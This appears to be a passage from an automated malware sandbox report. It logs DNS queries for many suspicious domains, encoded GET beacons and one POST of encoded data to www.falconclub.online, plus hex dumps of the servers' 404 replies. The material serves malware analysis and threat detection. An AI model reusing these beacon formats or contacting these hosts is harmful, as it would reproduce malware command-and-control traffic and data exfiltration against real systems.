            Source: global traffic | HTTP traffic detected: GET /eoqq/?tpTd=WfaN7QdSX3VNxg1q9fkfNv4hQq9KYwkNivs6k+R5An5RjxagqDfSiLpQ7QxvwrMnBdqTEtPHhZ8GpglWyWgxMX7+0Hc5PxIPKPsdiKxnaB1g3ZY6yQ==&WX=rnWllP5PLlhLLtj HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.wajf.net | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /c6cw/?WX=rnWllP5PLlhLLtj&tpTd=FqG002IG5EdskeSYnMZEmsgm4M8u04DOLE26DOOOZGkEYfdt2aoEMjGd+Okidkvsa7u+peDvqMbFWL8Zvpj7qkQAFbZLww+9EwijpyIUD9D3/88cfw== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.drivedoge.website | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /hd7m/?tpTd=sLbEVsfW73VtVB0Jvj7gC+ceEVX4meQWoUuArYo60q3nO/kAxb5tEPXYoxmPYHkEXIEIOfWFMW/cSWDV+KoY2jgQgwLtxzjq6i8n+9HhH6xOpB1tMw==&WX=rnWllP5PLlhLLtj HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.torex33.online | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
            Source: global traffic | DNS traffic detected: DNS query: www.multileveltravel.world
            Source: global traffic | DNS traffic detected: DNS query: www.falconclub.online
            Source: global traffic | DNS traffic detected: DNS query: www.promasterev.shop
            Source: global traffic | DNS traffic detected: DNS query: www.childlesscatlady.today
            Source: global traffic | DNS traffic detected: DNS query: www.animekuid.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.doggieradio.net
            Source: global traffic | DNS traffic detected: DNS query: www.demovix.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.palcoconnector.net
            Source: global traffic | DNS traffic detected: DNS query: www.shanhaiguan.net
            Source: global traffic | DNS traffic detected: DNS query: www.mtcep.org
            Source: global traffic | DNS traffic detected: DNS query: www.es-lidl.online
            Source: global traffic | DNS traffic detected: DNS query: www.wajf.net
            Source: global traffic | DNS traffic detected: DNS query: www.drivedoge.website
            Source: global traffic | DNS traffic detected: DNS query: www.torex33.online
            Source: global traffic | DNS traffic detected: DNS query: www.broomeorchard.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.wcq24.top
            Source: unknown | HTTP traffic detected: POST /sld7/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Host: www.falconclub.online | Origin: http://www.falconclub.online | Cache-Control: max-age=0 | Content-Length: 193 | Connection: close | Content-Type: application/x-www-form-urlencoded | Referer: http://www.falconclub.online/sld7/ | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36 | Data Raw: 74 70 54 64 3d 79 75 32 4c 63 68 76 55 63 45 70 51 68 56 4e 52 35 64 61 53 69 73 5a 4d 65 41 78 47 73 71 2b 75 4f 57 63 37 70 48 4f 67 48 2b 4b 49 62 72 65 38 37 73 70 4b 44 33 70 74 45 6f 45 48 33 49 42 36 7a 53 64 70 68 4f 56 76 4b 65 78 34 79 6b 4d 71 30 48 56 4b 71 35 58 4a 73 76 33 73 72 70 70 6a 64 6c 31 77 30 2f 59 2b 79 30 4e 74 31 36 7a 4b 76 62 66 6a 64 4c 76 41 70 41 43 6e 49 71 73 45 6f 38 53 36 4b 42 62 36 65 62 69 46 4a 35 63 6e 68 31 58 71 37 48 43 38 78 64 56 57 52 49 2f 62 4e 62 6f 6d 4a 68 41 38 4b 38 30 62 75 50 4c 78 48 52 42 46 45 49 5a 52 67 4a 6b 6e | Data Ascii: tpTd=yu2LchvUcEpQhVNR5daSisZMeAxGsq+uOWc7pHOgH+KIbre87spKD3ptEoEH3IB6zSdphOVvKex4ykMq0HVKq5XJsv3srppjdl1w0/Y+y0Nt16zKvbfjdLvApACnIqsEo8S6KBb6ebiFJ5cnh1Xq7HC8xdVWRI/bNbomJhA8K80buPLxHRBFEIZRgJkn
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Tue, 08 Oct 2024 13:33:53 GMT | Server: Apache | Content-Encoding: gzip | Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Tue, 08 Oct 2024 13:33:55 GMT | Server: Apache | Content-Encoding: gzip | Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Tue, 08 Oct 2024 13:33:58 GMT | Server: Apache | Content-Encoding: gzip | Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 626 | Connection: close | Date: Tue, 08 Oct 2024 13:34:01 GMT | Server: Apache | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 13:34:37 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://animekuid.xyz/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Content-Encoding: br | Content-Length: 9101 | Content-Type: text/html; charset=UTF-8 | Data Raw: 13 c4 bc 14 91 98 0f 80 8a c0 b8 89 8f 75 9e ef 3f 35 f5 ff eb 78 e6 16 fd 31 32 4f 26 5f 00 10 1b 57 99 ca b6 df c5 8e ef 66 7b 34 20 09 4a 8c b9 0d 01 59 54 14 55 fd 6f 7f d3 be bf 7c 53 b5 33 c0 08 87 d4 a9 b3 9b da 95 e2 29 76 0e b1 28 9d 2b ea bd b7 bb 9a 1f ee c6 ff ee 80 99 03 0f 9c 39 10 94 07 cc 00 a9 f1 80 0a 6f df ee df 7f 77 38 90 59 01 a4 64 c5 00 c5 08 39 84 d0 79 dc f4 29 b6 05 04 34 d4 5c e9 32 97 7e 8c 66 db 3e 4b b1 10 24 bc 7c 7f 2f 2e 5f 4e 7c de 2b 7c 62 44 60 9d f8 72 a4 df 3f 27 ae 84 44 c4 55 5e c7 63 a8 f6 be 25 1f 11 05 c1 86 ac 0f 99 8a ee 7d 4d db 18 10 5f 38 a1 ce 47 09 b0 ce af 60 93 eb da c3 57 bd 4c 8e 4c 4f 6e ae d1 99 f4 e9 bd c3 4d ff e5 0c 00 e0 72 85 8e 14 86 f9 5a 8e ba d9 8e 27 ec 6b b2 69 43 15 a3 1d 52 74 e4 95 a8 63 68 3a 75 75 94 63 5b e5 07 37 55 5f c0 cd 56 e8 07 07 b8 88 80 30 7f 3d ce 97 f0 b2 6f 3a f3 79 f7 f1 cd de cc 1e f8 d9 65 db f4 0f 30 ff 01 ec be 47 3d f4 ce 52 d2 1c d7 63 63 3b 0c 70 9f 3c 47 d6 9f 95 7f d5 ce 4c 8d 6e 9f 7d 2c 87 de a2 1a c8 92 34 59 15 81 51 cd 71 32 9d 3c 57 54 66 c0 e4 44 11 f8 1c 03 fd 13 75 ed 9f 55 0b df 59 5a 2b 00 e8 57 65 a6 49 bb 6c bf d9 ba 17 92 b1 a5 62 6c 19 32 b6 8c 18 5b c6 8c 2d 13 c6 96 29 63 0b a2 b9 7d 6e f7 7a c4 85 07 3e 30 20 5b 65 6c 75 3d 0c 59 76 52 fd f0 07 11 7e 97 63 16 75 42 48 9a 86 b0 df 62 26 05 96 12 cb 78 09 6a 68 57 3d 7d c6 b1 c2 71 88 13 7e 3b 67 26 d7 dc 7f c6 51 88 a3 08 c7 62 2f 5d 96 a6 77 8f bf 47 61 84 79 92 62 a1 92 6b 2a 9e 86 b8 1a 8a c2 0b 24 e5 5a f9 54 09 cc a5 c0 3c 4d ef d7 aa 01 39 c4 c2 59 a2 f6 68 fc c0 20 32 6c a6 bc 1f 0e 86 05 c7 22 4a 51 b6 cd 1b e2 c9 71 52 2c 0a 50 23 8f 02 7d 30 4a 60 a5 b0 aa f0 98 33 73 76 e3 22 0c f1 cf a3 50 fc ce c6 eb 66 a1 14 be f5 1e a6 30 d8 1d e5 12 df 66 11 1d 86 a3 16 cf fb ee 44 12 a7 0a 52 a8 c8 90 08 67 4d 69 c0 4e 60 ea 31 94 b2 5b 90 e0 88 7d 98 6e ae 85 bc da 36 45 18 41 ca 47 be f8 42 72 8d d8 8b c7 89 8b 4e cf fb ef a9 91 71 84 8e b3 31 7a ec 02 82 21 0b d8 ab 75 51 f5 16 e8 a2 fa ba b1 dc 5e f0 79 eb 22 08 f4 28 77 a9 87 5d 53 d1 f9 f0 23 99 cf 28 8e 31 4d b4 3a d3 31 95 ca 53 0f ce 44 c2 f7 b6 de 8f a6 1b be 37 d7 c6 b9 a6 df 58 c8 e1 88 64 48 f3 66 6a 35 b7 7d 6d 76 17 dc 05 96 ee 57 ad 2b df ad a2 96 dd 05 62 b4 7a 17 64 f0 95 ee 02 1e 52 46 e5 5d 10 8b 39 16 d7 99 08 23 33 3b 94 21 f9 f5 28 40 18 d9 c7 4d 9e a3 f6 71 f3 b8 d9 3e 6e de be bc c9 3e be 6b d8 4d a5 d9 e7 88 ca a1 2f b5 4b aa ca c0 7b 1b 49 3b ee 82 fd 48 e4 e9 f8 5d f0 dd 06 62 ba 94 08 e6 94 2a 92 df fe d1 4c 79 44 23 2a d0 e9 b4 3c 0b fe 7b be 0b 14 5c | Data Ascii: u?5x12O&_Wf{4 J
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 13:35:07 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 16026 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 13:35:10 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 16026 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 